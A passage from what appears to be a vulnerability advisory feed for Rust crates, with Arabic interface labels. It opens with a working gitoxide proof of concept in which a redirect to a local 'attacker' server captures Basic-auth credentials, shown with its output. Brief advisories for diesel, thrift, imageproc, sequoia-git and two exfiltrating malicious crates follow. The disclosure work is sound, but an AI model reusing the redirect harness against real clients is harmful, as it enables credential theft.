legit_handle = thread::spawn(move || { let (mut conn, _) = legit.accept().expect("accept legit"); let mut reader = BufReader::new(conn.try_clone().unwrap()); let mut request_line = String::new(); reader.read_line(&mut request_line).unwrap(); println!("[legit] Received: {}", request_line.trim()); loop { let mut line = String::new(); reader.read_line(&mut line).unwrap(); if line.trim().is_empty() { break; } } let redirect_url = "http://127.0.0.1:9090/repo.git/info/refs?service=git-upload-pack"; let response = format!( "HTTP/1.1 302 Found\r\nLocation: {redirect_url}\r\nContent-Length: 0\r\n\r\n" ); conn.write_all(response.as_bytes()).unwrap(); conn.flush().unwrap(); println!("[legit] Sent 302 redirect to attacker server"); }); thread::sleep(std::time::Duration::from_millis(100)); println!("\n[client] Connecting to http://127.0.0.1:8080/repo.git with credentials..."); let url: gix_url::Url = "http://127.0.0.1:8080/repo.git".try_into().expect("parse url"); let mut transport: http::Transport<http::curl::Curl> = http::connect(url, gix_transport::Protocol::V1, false); transport .set_identity(gix_sec::identity::Account { username: "victim-user".into(), password: "super-secret-token".into(), oauth_refresh_token: None, }) .expect("set identity"); println!("[client] Performing handshake (GET /info/refs)..."); match transport.handshake(gix_transport::Service::UploadPack, &[]) { Ok(_) => println!("[client] Handshake succeeded"), Err(e) => println!("[client] Handshake error: {e}"), } println!("[client] Sending request (POST /git-upload-pack)..."); match transport.request(client::WriteMode::Binary, client::MessageKind::Flush, false) { Ok(_writer) => println!("[client] Request sent"), Err(e) => println!("[client] Request error: {e}"), } legit_handle.join().ok(); attacker_handle.join().ok(); println!("\n=== RESULT ==="); if let Ok(headers) = captured_rx.recv_timeout(std::time::Duration::from_secs(2)) { let leaked = headers.iter().any(|h| h.starts_with("Authorization:")); if leaked { let auth = headers.iter().find(|h| h.starts_with("Authorization:")).unwrap(); println!("VULNERABLE: Credentials leaked to attacker server!"); println!("Captured: {auth}"); } else { println!("NOT VULNERABLE: No credentials captured."); } } else { println!("ERROR: Timed out."); } } ``` </details> **Output:** ``` [attacker] GET /info/refs headers (from redirect): GET /repo.git/info/refs?service=git-upload-pack HTTP/1.1 Host: 127.0.0.1:9090 Accept: */* User-Agent: git/oxide-0.55.0 [attacker] POST /git-upload-pack headers: POST /repo.git/git-upload-pack HTTP/1.1 Host: 127.0.0.1:9090 >>> LEAKED: Authorization: Basic dmljdGltLXVzZXI6c3VwZXItc2VjcmV0LXRva2Vu VULNERABLE: Credentials leaked to attacker server! Captured: Authorization: Basic dmljdGltLXVzZXI6c3VwZXItc2VjcmV0LXRva2Vu ``` The GET (from redirect) has no `Authorization` header. The POST carries the full credentials. The base64 decodes to `victim-user:super-secret-token`. ## Impact Any user who clones or fetches over HTTP(S) using gitoxide with the curl backend (`http-client-curl` feature) can have their credentials stolen by an attacker who controls a redirect target (via compromised server, DNS hijacking, or MITM). The only user interaction required is initiating the clone or fetch; the redirect and credential leak happen transparently. CI/CD pipelines using tokens are also at risk. ## Suggested Fix 1. Only attach `Authorization` if the effective URL's host matches the original URL's host. 2. Or block cross-origin redirects in the curl backend, matching reqwest's behavior. 3. Check the effective URL's scheme (not the original) for the HTTPS-to-HTTP downgrade.

الإصدارات المتأثرة

All versions < 0.56.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N

عالية
📦 diesel 📌 All versions < 2.3.8 🗃️ قاعدة بيانات 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 Diesel uses the `sqlite3_value_text` function to receive strings from SQLite while deserializing query results. We misinterpreted the corresponding [SQLite](https://sqlite.org/c3ref/value_blob.html) documentation that this function always returns a UTF-8 encoded string values as ...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

Diesel uses the `sqlite3_value_text` function to receive strings from SQLite while deserializing query results. We misinterpreted the corresponding [SQLite](https://sqlite.org/c3ref/value_blob.html) documentation that this function always returns a UTF-8 encoded string values as `*const c_char`. Based on that we used `str::from_utf8_unchecked` to construct a Rust string slice without any additional UTF-8 checks in place. It turned out that this function doesn't always return correct UTF-8 strings. For field of the SQLite side storage type `BLOB` this pointer can contain arbitrary bytes, which makes the usage of `str::from_utf8_unchecked` unsound as this violates the safety contract of `str` to only contain valid UTF-8 encoded Strings. ## Mitigation The preferred mitigation to the outlined problem is to update to a Diesel version 2.3.8 or newer, which includes fixes for the problem. ## Resolution Diesel now correctly checks whether the provides byte buffer is actually valid UTF-8, instead of relying on SQLite's documentation. This fix is included in the `2.3.8` release.

الإصدارات المتأثرة

All versions < 2.3.8

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

غير محدد
📦 steamworks 📌 All versions < 0.13.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل 🟢 ترقيع
💬 Processing the raw `ValidateAuthTicketResponse_t` callback data panics when the `m_eAuthSessionResponse` field is `k_EAuthSessionResponseAuthTicketNetworkIdentityFailure`. This can lead to denial of service in game clients and servers using the `begin_authentication_session` API ...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

Processing the raw `ValidateAuthTicketResponse_t` callback data panics when the `m_eAuthSessionResponse` field is `k_EAuthSessionResponseAuthTicketNetworkIdentityFailure`. This can lead to denial of service in game clients and servers using the `begin_authentication_session` API to authenticate players if a malicious game client sends an authentication ticket with a network identity that does not match that of the verifier.

الإصدارات المتأثرة

All versions < 0.13.1

5.3/10 متوسطة
📦 thrift 🏢 apache 📌 All versions < 0.23.0 🗄️ سيرفر 🦀 مكتبة Rust crates.io ⚡ CWE-789 🎯 عن بعد ⚪ لم تُستغل
💬 Memory Allocation with Excessive Size Value vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version [0.23.0](https://github.com/apache/thrift/releases/tag/v0.23.0), which fixes the issue.
📅 2026-05-05 NVD 🔗 التفاصيل

الوصف الكامل

Memory Allocation with Excessive Size Value vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version [0.23.0](https://github.com/apache/thrift/releases/tag/v0.23.0), which fixes the issue.

الإصدارات المتأثرة

All versions < 0.23.0

نوع الثغرة

CWE-789 — CWE-789

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

منخفضة
📦 sequoia-git 📌 All versions < 0.6.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 Before `sq-git` checks if a commit can be authenticated, it first looks for hard revocations. Because parsing a policy is expensive and a project's policy rarely changes, `sq-git` has an optimization to only check a policy if it hasn't checked it before. It does this by maintai...
📅 2026-05-04 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

Before `sq-git` checks if a commit can be authenticated, it first looks for hard revocations. Because parsing a policy is expensive and a project's policy rarely changes, `sq-git` has an optimization to only check a policy if it hasn't checked it before. It does this by maintaining a set of policies that it had already seen keyed on the policy's hash. Unfortunately, due to a bug the hash was truncated to be 0 bytes and thus only hard revocations in the target commit were considered. Normally this is not a problem as hard revocations are not removed from the signing policy. An attacker could nevertheless exploit this flaw as follows. Consider Alice and Bob who maintain a project together. If Bob's certificate is compromised and Bob issues a hard revocation, Alice can add it to the project's signing policy. An attacker who has access to Bob's key can then create a merge request that strips the hard revocation. If Alice merges Bob's merge request, then the latest commit will not carry the hard revocation, and `sq-git` will not see the hard revocation when authenticating that commit or any following commits. Note: for this attack to be successful, Alice needs to be tricked into merging the malicious MR. If Alice is reviewing MRs, then she is likely to notice changes to the signing policy. Reported-by: Hassan Sheet

الإصدارات المتأثرة

All versions < 0.6.0

CVSS Vector

CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

حرجة
📦 mysten-metrics 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل
💬 `mysten-metrics` included a build script that attempted to exfiltrate data from the build machine. The malicious crate had 1 version published on 2026-04-20 and had no evidence of actual usage. This crate had no dependencies on crates.io.
📅 2026-05-04 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

`mysten-metrics` included a build script that attempted to exfiltrate data from the build machine. The malicious crate had 1 version published on 2026-04-20 and had no evidence of actual usage. This crate had no dependencies on crates.io.

الإصدارات المتأثرة

All versions < 0

حرجة
📦 sui-execution-cut 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل
💬 `sui-execution-cut` included a build script that attempted to exfiltrate data from the build machine. The malicious crate had 1 version published on 2026-04-20 and had no evidence of actual usage. This crate had no dependencies on crates.io.
📅 2026-05-04 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

`sui-execution-cut` included a build script that attempted to exfiltrate data from the build machine. The malicious crate had 1 version published on 2026-04-20 and had no evidence of actual usage. This crate had no dependencies on crates.io.

الإصدارات المتأثرة

All versions < 0

غير محدد
📦 imageproc 📌 All versions < 0.26.2 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل 🟢 ترقيع
💬 A bounds check was performed in floating points before a cast to the index passed to an unchecked access function. This checked considered `NaN` cases improperly, causing them to succeed the check instead of failing it. The floating point coordinate is under caller control by pas...
📅 2026-05-01 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

A bounds check was performed in floating points before a cast to the index passed to an unchecked access function. This checked considered `NaN` cases improperly, causing them to succeed the check instead of failing it. The floating point coordinate is under caller control by passing a selected projection matrix. Carefully controlling the coordinates of an image with no data and one non-zero dimension provides an arbitrary read primitive in the first 32-bits of address space with a Bilinear sampling method. Using bicubic sampling can result in a read of a few bytes beyond an allocation. Other out-of-bounds reads may be possible.

الإصدارات المتأثرة

All versions < 0.26.2

غير محدد
📦 imageproc 📌 All versions < 0.26.2 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل 🟢 ترقيع
💬 A bounds verification of a slice storage of a 2-dimensional matrix's coefficients (a kernel) would compare the total size against the product of individual dimensions. This would erroneously cast *after* the multiplication and consequently fail to detect possible violations when ...
📅 2026-05-01 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

A bounds verification of a slice storage of a 2-dimensional matrix's coefficients (a kernel) would compare the total size against the product of individual dimensions. This would erroneously cast *after* the multiplication and consequently fail to detect possible violations when overflow occurs. Afterwards, the individual sizes were trusted to properly constrain coordinates within the matrix to indices valid for the underlying storage. With a crafted `Kernel` object, certain combinations of coordinates could then cause an out-of-bounds access in an `unsafe` function while fulfilling its documented preconditions. The kernel value could be passed to library functions that trusted the preconditions and then performed such reads.

الإصدارات المتأثرة

All versions < 0.26.2

غير محدد
📦 imageproc 📌 All versions < 0.26.2 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل 🟢 ترقيع
💬 A read of pixels was coded as modifying coordinates to lie within the image bounds. It would calculate a coordinate by adding a constant to an input and taking the minimum of the resulting coordinate and 'dimension - 1'. This would not protect against malicious inputs that could ...
📅 2026-05-01 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

A read of pixels was coded as modifying coordinates to lie within the image bounds. It would calculate a coordinate by adding a constant to an input and taking the minimum of the resulting coordinate and 'dimension - 1'. This would not protect against malicious inputs that could overflow the addition. . Subsequently to the tricked bounds check the image could then be sampled at multiple, differently calculated coordinates exceeding the bounds.

الإصدارات المتأثرة

All versions < 0.26.2